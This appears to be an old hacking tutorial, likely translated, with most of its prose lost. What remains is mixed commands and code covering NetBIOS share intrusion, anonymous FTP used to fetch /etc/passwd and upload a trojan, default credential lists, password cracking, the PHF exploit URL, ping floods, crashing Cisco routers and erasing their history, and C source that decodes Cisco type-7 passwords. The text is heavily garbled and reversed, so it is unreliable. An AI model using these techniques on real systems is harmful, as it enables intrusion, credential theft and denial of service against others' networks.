:

:
ping -t www.***.com

ping -t -a -f www.***.com

ping www.***.com

com/com.wav
com3/com3/.wav
com1/com.wav


ping -w timeout www.***.com

NETSTAT -S

NETSTAT -A


NETSTAT -N




NETSTAT -P

drwatson

 NetBios Attack

Home Network
LAN WAN MAN

.
: IP

.
-1 IP
) 207.107.1.1 (.
-2 START RUN
CMD .
-3 Nbtstat A IP
: ADRESS IP
IP ADRESS . ENTER
-4 :
NetBIOS Remote Machine Name Table
____________________________________
Name Type Status
------------------------------------------J-1 <00> UNIQUE Registered
WORK <00> GROUP Registered
J-1 <03> UNIQUE Registered
J-1 <20> UNIQUE Registered
WORK <1E> GROUP Registered
WORK <1D> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered
:

 .
-5 >< HEX
CODE VALUE 20
PRINTER
OR FILES SHARED TURNED ON



.
-6


:
<Net view \\<insert ip_address here
-7
:
Shared resources at \\ip_address
Sharename Type Comment
MY DOCUMENTS Disk
TEMP Disk
-8 TEMP
:
Net use x: \\<insert IP address
here>\temp
NSETBIOS

 ..
*

User name-Password

PASSWD


FTP=File Transfer Protocol

start==>run
telnet
Remote System
==> connect
Host Name
kahane.org
PORT 21

 connect
..
!! source code
user anonymous

pass zzzoozz@yahoo.com



..



cute ftp - ws_ftp


ftp.kahane.org

retr /etc/passwd

 etc/ passwd


Sunos 5.0 etc/shadow etc/passwd
Linux etc/shadow etc/passwd
BSD4.3 RENO etc/master.passwd
AIX etc/security/passwd
NT scripts/passwd
passwd
admin.pwl
exe
-:
<< command )
start>runcopy server.exe server.com
server
com,scr,bat



.

netstat
===========================
===================
NETSTAT


NETSTAT A-

NETSTAT E-

NETSTAT N-

NETSTAT P-

NETSTAT R-

NETSTAT S-

:
FTP

21

FTP


Superscanne



Start

Run

ftp n

FTP&g


Open

Enter

FTP&g
To

To
IP


Connected to www.assassin.com
websrv1 Microsoft FTP Service 220
).(Version 4.0

ftp&gquote user ftp

Anonymous acces allowed, send 331
.identify (e-mail name) as password

ftp&gquote cwd ~root

Please login with USER and PASS 530

ftp&gquote pass ftp

.Anonymous user logged in 230

20




Pwd

Cd

Cd black

Ls

Get

Get black.exe
Put
**
Get


Put black.exe
Clos




:Codes: Signification
.Restart marker reply 110
Service ready in nnn minutes. (nnn 120
est un temps)
Data connection already open; 125
.transfer starting
File status oka about to open data 150
.connection
.Command okay 200
Command not implemented, 202
.superfluous at this site
System status, or system help 211
.reply
.Directory status 212
.File status 213
.Help message 214
.NAME system type 215
.Service ready for new user 220
.Service closing control connection 221
Data connection open; no transfer 225
.in progress
.Closing data connection 226
Entering passive mode (h1, h2, h3, 227
.h4, p1, p2)

.User logged in, proceed 230

Requested file action okay, 250
.completed
.PATHNAME\" created"\ 257
.User name okay, need password 331
.Need account for login 332
Requested file action 350
.pendingfurther information
Service not available, closing 421
.control connection
.Can\'t open data connection 425
Connection closed; transfer 426
.aborded
Requested file action not taken. 450
(Fichier dj utilis par autre chose)
Requested action aborded: local 451
.error processing
Requested action not taken. (Pas 452
assez de mmoire pour excuter
l\'action)
Syntax error, command 500
.unrecognized
Syntax error in parameters or 501
.arguments
.Command not implemented 502
.Bad sequence of commands 503
Command not implemented for that 504
.parameter
.Not logged in 530
.Need account for storing files 532
Requested action not taken. 550
(Fichier non trouv, pas d\'accs
possible,...)

Requested action aborded: page 551

.type unknown
.Requested file action aborded 552
Requested action not taken. (Nom 553
)de fichier non attribu
----------------------- :


...

Telnet://IPNumberort IPNumber
port

:
)32 - 25 - 21( 2001 - 99 -


==================
3 :

) ShadowSecurityScanner
(
/http://packetstorm.securify.com

. SSS


:
:
anonymous : anonymous
guest : guest
root : root

sys : sys
sys : sysadm
sys : system
games : games
ftp : ftp
mail : mail
)
** Unix
( :
young
test

unpassworded accounts
.
:
GET /etc/passwd GET /etc/group
GET /etc/shadow
: :
data = download
.
===========================
========
? psswd

...
. root
: root



su username .
:
1

 /etc .
2 shadow
shadow . unshadow
3 ..


...
:
sirhack:89fGc%^7&a, Ty:100:100: Sir
Hackalot: /usr/sirhack:/bin/sh
:
1 . sirhack :
2 . 89fGc%^7 :
3 . Sir Hackalot :
4 /usr/sirhack :
5 ) ** **( :
/bin/sh
.
===========================
========
? group

) (
passwd .
===========================
========
? shadow
psswd
...
===========================
========

:

 1 . Cracker Jack
2 . John the ripper

**)**( ...
**
http://www.openwall.com/john/john1.6.tar.gz

http://www.openwall.com/john/john16w.zip
+++++++++++++++++++++++++++
+++++++++++++++++++++++






enter :
**

HELP = HELP
COPY = CP
MOVE = MV
DIR = LS
DEL = RM
CD = CD


WHO
) FINGER (
FINGER


:
**
/etc directory
passwd



Cracker Jack


http://www.geocities.com/SiliconValley/9
185

sable.ox.ac.uk/pub/wordlists
4 8

Cracker Jack


)(:




anonymously

 ftp
/etc directory


Cracker Jack

PHF

**
http://xxx.xxx.xxx/cgi-bin/phf?Qali...t
%20/etc/passwd
**

backup
/etc/shadow

apache

:

UNIX,linux, aix, irix, ultrix, bsd, or

(sometimes even DOS or Vax / Vms
: **


** **


**

+++++++++++++++++++++++++++
port

) (

......


)
( .
:
:
Start&gRun & l

command.com
:
ping host
:
ping port
enter
:
ping port1027
enter
:
ping port80
enter
:
ping

 enter
:
ping port
enter
..

.
===========================
===========
&&&&&&&&&&&&&&&&&&&

netbios
http://digitalx.150m.com/1.htm
&&&&&&&&&&&&&&&&&&&

dos

^^^^^^^^^^^^^^^^^^^^^^^
http://b0iler.eyeonsecurity.net/tutorials/
powerdos.htm

Exploiting Cisco Systems

Dr^FunnY :
Hackerz-Boss@hackermail.com
------------------------------------

 Hacking
Networks Routers

.


Cisco Routers

... Cisco Systems

:
, cisco systems
,
.




------------------------------------ :
------------------------------------ :
IP ISP TCP/IP packet - spoof IP

 Telnet HyperTerminal Ping TraceRoute proxy server--------------------------------------- : ciscorouter

: cisco router : cisco router
: cisco router
-------------------------------------- :
-------------------------------------- : IP IP , Internet Protocol

,


, IP
IP
.

,,,,
:
log
IRC
ICQ
" "do not show ip

" "systat

IP- logging java

IP

Sub7 .NetBus
-------------------------------------------- : ISP ISP Internet Service
Provider

,,, dial-up

 traceroute ISP
..
:
tracert 222.222.22.22
Tracing route to [221.223.24.54]
.over a maximum of 30 hops
147ms 122ms 132ms your.isp 1
[222.222.22.21]
122ms 143ms 123ms isp.firewall 2
[222.222.22.20]
156ms 142MS 122ms aol.com 3
[207.22.44.33]
Request timed out * * * 4
101ms 102ms 133ms cisco.router 5
[194.33.44.33]
233ms 143ms 102ms something.ip 6
[111.11.11.11]
222ms 123ms 213ms netcom.com 7
[122.11.21.21]
152ms 211ms 212ms blahblah.tts.net 8
[121.21.21.33]
122ms 223ms 243ms altavista.34.com 9
[121.22.32.43] <<< target's isp
101ms 122ms 132ms 10
221.223.24.54.altavista.34.com
[221.223.24.54]
.Trace complete
----------------------------------: TCP/IP packet -

 TCP/IP Transmission Control

Protocol .. Internet Protocol TCP/IP
packet
,
, header

,
, header

,
packet



... ..


... .
-------------------------------------------- spoof : IP Genius 2
.. DC IS
,, IdentD
,
IRC

spoof

...

 logs

-------------------------------------------- : Telnet telnet

Start Menu Run
Telnet
, Terminal > Preferences
buffer size font ,
". "local echo
local echo


.

telnet port , 23


25 21
FTP ,,,,
.
-------------------------------------------- : HyperTerminal HyperTerminal " "server



HyperTerminal > Start
> Programs > Accessories

 . Communications > HyperTerminal

..
" "TCP/IP Winsock
.. Call

listening
Call > Wait for
, Call Chat

-------------------------------------------- : Ping Ping ,
MS-DOS prompt
" , "ping ip.address
,
:
""ping ip.address -t
,
.. :
""ping -l (size) ip.address
Ping

,
.
Ping
ping floods

Windows 98 .
ping
flood ,

 bandwidth
.
Ping flooding


: t-
,
. Unix
Linux ping -f

-------------------------------------------- : TraceRoute TraceRoute
,
,
MS-DOS prompt
" "tracert ip.address

.
firewalls ISP
) (internet service provider

TraceRoute :
TraceRoute
TCP/IP
packet header
, TTL
. Time To Live
TTL
,
..




, bandwidth TTL
..
ICMP

TraceRoute
-------------------------------------------- : proxy server
proxy server ,

telnet hyperterminal



===========================
===================
: cisco router
..
cisco router


..


...
cisco routers
:
T1 18
,
...

ISP
ISP


...
DENIAL OF SERVICE




Telnet .

packets

decoded

....

trusted systems
rcp rsh

 )
rcp rsh
( Network Services
------------------------------------------------------------------- : cisco router

, ISP

traceroute
ISP )
( ISP traceroute
IP
ISP
...
, :
tracert 222.222.22.22
]Tracing route to [221.223.24.54
.over a maximum of 30 hops
147ms 122ms 132ms your.isp 1
][222.222.22.21
122ms 143ms 123ms isp.firewall 2
][222.222.22.20
156ms 142MS 122ms aol.com 3
][207.22.44.33
Request timed out * * * 4

101ms 102ms 133ms cisco.router 5

][194.33.44.33
233ms 143ms 102ms something.ip 6
][111.11.11.11
222ms 123ms 213ms netcom.com 7
][122.11.21.21
152ms 211ms 212ms blahblah.tts.net 8
][121.21.21.33
122ms 223ms 243ms altavista.34.com 9
[121.22.32.43] <<< target's isp
101ms 122ms 132ms 10
221.223.24.54.altavista.34.com
][221.223.24.54
.Trace complete

,
firewall
Ping ,

firewall
firewall

firewall

23 ....

.. ,

 ..
,
.

..
proxy server
23
LOGs
------------------------------------------------------------------- : cisco router

v4.1 software
.
23
:
10293847465qpwoeirutyalskdjfhgzmxnc
bv019dsk1029384
7465qpwoeirutyalskdjfhgzmxncbv019ds
k10293847465qpw
oeirutyalskdjfhgzmxncbv019dsk102938
47465qpwoeiruty
alskdjfhgzmxncbv019dsk10293847465q
pwoeirutyalskdjf
hgzmxncbv019dsk10293847465qpwoeir
utyalskdjfhgzmxnc
bv019dsk10293847465qpwoeirutyalskdj
fhgzmxncbv019ds

k10293847465qpwoeirutyalskdjfhgzmxn
cbv019dsk
..
reboot ,
offline .
..
freeze 10-2

.. v4.1 software
,
DOS
.. ,
", "ping -l 56550 cisco.router.ip -t

frozen
..
)
(
" .... "admin

default
password ,
frozen
default

,

prompt " :
, "htl-textil "?"


, transfer
.. command
)
( IP
.. 23
:
) HyperTerminal
(
wait for a call
..

.
..
HyperTerminal
, yes
.
.. history

""history size 0
Logout

...


-------------------------------------------------------------------- : cisco router




. ..
John the Ripper
.
.
,
..
..


. compile

Ctli + Shift

<include <stdio.h#
<include <ctype.h#
} = []char xlat
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b,
,0x66, 0x6f
0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65,
,0x77, 0x72
0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
{;
;" char pw_str1[] = "password 7
;" char pw_str2[] = "enable-password 7
;char *pname

cdecrypt(enc_pw, dec_pw)
;char *enc_pw
;char *dec_pw
}
;unsigned int seed, i, val = 0
if(strlen(enc_pw) & 1)
;return(-1)
seed = (enc_pw[0] - '0') * 10 +
;'enc_pw[1] - '0
if (seed > 15 || !isdigit(enc_pw[0]) || !
isdigit(enc_pw[1]))
;return(-1)
} for (i = 2 ; i <= strlen(enc_pw); i++)
} if(i !=2 && !(i & 1))
;dec_pw[i / 2 - 2] = val ^ xlat[seed++]
;val = 0
{
;val *= 16
if(isdigit(enc_pw[i] =
} toupper(enc_pw[i])))
;'val += enc_pw[i] - '0
;continue
{
if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F')
}

;val += enc_pw[i] - 'A' + 10

;continue
{
if(strlen(enc_pw) != i)
;return(-1)
{
;dec_pw[++i / 2] = 0
;return(0)
{
()usage
}
fprintf(stdout, "Usage: %s -p
;<encrypted password>\n", pname)
fprintf(stdout, " %s <router config file>
;<output file>\n", pname)
;return(0)
{
main(argc,argv)
;int argc
;char **argv
}
;FILE *in = stdin, *out = stdout
;char line[257]
;char passwd[65]
;unsigned int i, pw_pos

;pname = argv[0]
if(argc > 1)
}
} if(argc > 3)
;()usage
;exit(1)
{
if(argv[1][0] == '-')
}
} switch(argv[1][1])
:'case 'h
;()usage
;break
:'case 'p
} if(cdecrypt(argv[2], passwd))
;fprintf(stderr, "Error.\n")
;exit(1)
{
fprintf(stdout, "password: %s\n",
;passwd)
;break
:default
fprintf(stderr, "%s: unknow option.",
;pname)
{
;return(0)
{

if((in = fopen(argv[1], "rt")) == NULL)

;exit(1)
if(argc > 2)
if((out = fopen(argv[2], "wt")) == NULL)
;exit(1)
{
} while(1)
} for(i = 0; i < 256; i++)
} if((line[i] = fgetc(in)) == EOF)
if(i)
;break
;fclose(in)
;fclose(out)
;return(0)
{
if(line[i] == '\r')
;--i
if(line[i] == '\n')
;break
{
;pw_pos = 0
;line[i] = 0
if(!strncmp(line, pw_str1,
strlen(pw_str1)))
;pw_pos = strlen(pw_str1)
if(!strncmp(line, pw_str2,
strlen(pw_str2)))
;pw_pos = strlen(pw_str2)

} if(!pw_pos)
;fprintf(stdout, "%s\n", line)
;continue
{
} if(cdecrypt(&line[pw_pos], passwd))
;fprintf(stderr, "Error.\n")
;exit(1)
{
} else
if(pw_pos == strlen(pw_str1))
;fprintf(out, "%s", pw_str1)
else
;fprintf(out, "%s", pw_str2)
;fprintf(out, "%s\n", passwd)
{
{
{
Linux
John the
. Ripper
--------------------------------------------John the Ripper
/http://www.openwall.com/john
-------------------------------------------



Session number to resume <1-99>
access-enable Create a temporary
Access-List entry
access-profile Apply user-profile to
interface
clear Reset functions
connect Open a terminal connection
disable Turn off privileged commands
disconnect Disconnect an existing
network connection
enable Turn on privileged commands
exit Exit from the EXEC
help Description of the interactive help
system
lock Lock the terminal
login Log in as a particular user
logout Exit from the EXEC
mls exec mls router commands
mrinfo Request neighbor and version
information from a multicast router
mstat Show statistics after multiple
multicast traceroutes
mtrace Trace reverse multicast path
from destination to source
name-connection Name an existing
network connection
pad Open a X.29 PAD connection
ping Send echo messages

ppp Start IETF Point-to-Point Protocol

(PPP)
resume Resume an active network
connection
rlogin Open an rlogin connection
set Set system parameter (not config)
show Show running system information
slip Start Serial-line IP (SLIP)
systat Display information about
terminal lines
telnet Open a telnet connection
terminal Set terminal line parameters
traceroute Trace route to destination
tunnel Open a tunnel connection
where List active connections
x28 Become an X.28 PAD
x3 Set X.3 parameters on PAD